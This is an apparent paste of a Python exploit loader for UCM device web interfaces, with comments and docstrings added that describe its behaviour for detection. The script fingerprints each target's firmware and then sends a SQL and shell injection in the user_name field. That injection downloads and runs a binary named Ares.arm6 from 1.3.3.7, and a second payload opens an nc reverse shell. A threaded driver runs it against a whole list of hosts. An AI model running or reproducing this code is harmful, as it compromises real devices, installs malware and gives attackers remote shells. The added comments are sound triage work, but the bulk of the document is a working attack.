KhaosBringer

UCM Exploit Loader.c

Nov 21st, 2020
  1. import os
  2. import re
  3. import sys
  4. import json
  5. import argparse
  6. import requests
  7. import threading
  8. from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silences the InsecureRequestWarning that requests emits for each call made
# with verify=False; both POSTs in Loader.infect skip certificate validation,
# so the script runs without any TLS warning on its console.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  10. # UCM Exploit Loader made by B4CKDOOR - PRIVATE #
  11. # B4CKDOORARCHIVE.CLUB #
  12.  
  13. #$top_parser = argparse.ArgumentParser(description='')
  14. #$top_parser.add_argument('--rhost', action="store", dest="rhost",
  15. #$required=True, help="The remote host to connect to")
  16. #$top_parser.add_argument('--rport', action="store", dest="rport", type=int,
  17. #$help="The remote port to connect to", default=8089)
  18. #$top_parser.add_argument('--lhost', action="store", dest="lhost",
  19. #$required=True, help="The local host to connect back to")
  20. #$top_parser.add_argument('--lport', action="store", dest="lport", type=int,
  21. #$help="The local port to connect back to", default=1270)
  22. #$args = top_parser.parse_args()
  23.  
  24.  
class Loader(object):
    """Per-target worker of a bulk exploitation script for UCM web interfaces.

    Constructing an instance immediately runs :meth:`infect` against one
    address, so the class is used purely as a thread target.

    Behaviour visible in this listing that is useful for detection and triage:

    * An HTTPS POST to ``/cgi`` on TCP port 8089 with the body
      ``action=getInfo``, sent without authentication and with certificate
      verification disabled.
    * A second POST to the same URL with the body
      ``action=sendPasswordEmail&user_name=...`` in which ``user_name``
      contains a single quote, ``or 1=1--``, a backtick and ``;``-separated
      shell commands. A ``user_name`` carrying those characters in web or
      CGI logs is a strong indicator of this script or a variant.
    * On the device side the commands reference ``/var/``, ``wget`` from an
      HTTP URL, ``chmod 777`` and execution of a file named ``Ares.arm6``
      with the argument ``ARES``.
    * The script itself treats firmware ``1.0.19.20`` and later as
      unaffected and stops before sending the second request.
    """

    def infect(self, adress: str) -> None:
        """Fingerprint one host, gate on its firmware version, send the payload.

        Args:
            adress: Host name or IP of the target (spelling as in the
                original); it is concatenated into the URL unchanged.

        Every failure path prints a ``[-]`` message and calls ``sys.exit(1)``.
        """
        # Port 8089 and the /cgi path are hard-coded; the commented-out
        # argparse block at the top of the paste is not used.
        url = 'https://' + adress + ':' + "8089" + '/cgi'
        print('[+] Sending getInfo request to ', url)

        # Step 1: unauthenticated information request. verify=False means a
        # self-signed or mismatched certificate does not stop the request.
        try:
            resp = requests.post(url=url, data='action=getInfo', verify=False)
        except Exception:
            print('[-] Error connecting to remote target')
            sys.exit(1)

        if resp.status_code != 200:
            print('[-] Did not get a 200 OK on getInfo request')
            sys.exit(1)

        # The body must begin with exactly this prefix (find() == 0),
        # otherwise the host is not treated as the expected device.
        if resp.text.find('{ "response":') != 0:
            print('[-] Unexpected response')
            sys.exit(1)

        try:
            parsed_response = json.loads(resp.text)
        except Exception:
            print('[-] Unable to parse json response')
            sys.exit(1)

        # The getInfo reply discloses model and firmware version to an
        # unauthenticated caller; both fields are read from response.* here.
        print('[+] Remote target info: ')
        print('\t-> Model: ', parsed_response['response']['model_name'])
        print('\t-> Version: ', parsed_response['response']['prog_version'])

        # Expect a four-part dotted numeric version such as A.B.C.D.
        match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$',
        parsed_response['response']['prog_version'])
        if not match:
            print('[-] Failed to extract the remote targets version')
            sys.exit(1)

        major = int(match[1])
        minor = int(match[2])
        point = int(match[3])
        patch = int(match[4])

        # Version gate: anything at or above 1.0.19.20 is reported as
        # unaffected and skipped; everything below it proceeds to step 2.
        if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0
        and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >=
        20):
            print('[-] Unaffected version')
            sys.exit(1)
        else:
            print('[+] Vulnerable version!')

        print("[+] loaded, %s" %(adress))
        try:
            # Step 2: the user_name value sent with sendPasswordEmail. It joins
            # a quote / `or 1=1--` fragment with a backtick and shell commands
            # that download a file from http://1.3.3.7/ into /var/, mark it
            # executable and run it. Presumably the device feeds user_name into
            # a SQL query and then a shell command; that handling is not
            # visible in this listing.
            # NOTE(review): the original trailing comment read "arm7" although
            # the file fetched is named Ares.arm6.
            exploit = "admin\' or 1=1--`;cd /var/; wget http://1.3.3.7/Ares.arm6 ; chmod 777 Ares.arm6 ; ./Ares.arm6 ARES" #arm7
            # Assigned but never sent in this listing: an alternative value
            # that invokes nc with -e /bin/sh towards 1.3.3.7 port 1270, with
            # ${IFS} standing in for spaces.
            exploit2 = 'admin\' or 1=1--`;`nc${IFS}' + "1.3.3.7" + '${IFS}' + "1270" + '${IFS}-e${IFS}/bin/sh`;`'
            resp = requests.post(url=url,
        data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
        except Exception as err:
            print('[-] Failed to send payload')
            sys.exit(1)

        if resp.status_code != 200:
            print('[-] Did not get a 200 OK on sendPasswordEmail request')
            sys.exit(1)

        try:
            parsed_response = json.loads(resp.text)
        except Exception:
            print('[-] Unable to parse json response')
            sys.exit(1)

        # A JSON reply with status == 0 is what the script reports as success;
        # any other status value prints the failure message and returns.
        if parsed_response['status'] == 0:
            print('[+] Success! Clean exit.')
        else:
            print('[-] Something bad happened.')

    def __init__(self, adress: str) -> None:
        """Run :meth:`infect` against ``adress`` as soon as the object is built."""
        self.infect(adress)
  101.  
# Driver: sys.argv[1] names a text file with one target address per line.
# Each line, with trailing whitespace stripped, is handed to Loader in its own
# thread, and the number of threads is not capped. On the network this shows
# up as a single source sending the getInfo / sendPasswordEmail pair to TCP
# 8089 on many hosts within a short time.
with open(sys.argv[1], "r") as f:
    for item in f.readlines():
        threading.Thread(target=Loader, args=(item.rstrip(), )).start()